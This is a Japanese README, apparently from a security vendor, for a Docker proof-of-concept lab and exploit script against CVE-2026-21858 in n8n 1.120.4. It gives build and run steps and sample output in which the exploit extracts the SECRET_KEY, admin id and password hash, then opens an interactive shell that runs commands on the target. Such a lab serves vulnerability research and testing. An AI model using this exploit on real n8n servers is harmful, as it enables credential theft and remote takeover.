
CVE-2026-21858(n8n 1.120.4 の任意ファイル読み取りおよび RCE 脆弱性)の Docker ベース PoC 環境とエクスプロイトスクリプトで、シークレット抽出とインタラクティブシェルを提供します。
Form Trigger ワークフローとエクスプロイトスクリプトを備えた n8n 1.120.4 用の PoC 環境。
Dockerfile — 脆弱な n8n 環境をビルドするrun.bat — コンテナを実行する (Windows)workflow.txt — n8n ワークフロー (Form Trigger を含む)poc.py — PoC スクリプトrequirements.txt — PoC の依存関係docker build -t n8n-vuln:1.120.4 .
run.bat
workflow.txt を貼り付けpip3 install -r requirements.txt
python3 poc.py
FINAL_SECRET_KEY、管理者識別子) を抽出します。n8n-shell>) が提供されます。id) を実行すると、ターゲット環境から出力が返されます (RCE)。[+] Success: SECRET_KEY = "..."
[+] Success: admin_id = "..."
[+] Success: admin_hash = "..."
=== n8n Shell Ready ===
n8n-shell> id
[!] 'id' Result:
------------------------------
uid=1000(n8n) gid=1000(n8n) groups=1000(n8n)
------------------------------
当社は CVE およびマルウェア分析を毎月公開しています。ご興味があれば、以下のリンクから当社の出版物をご覧ください。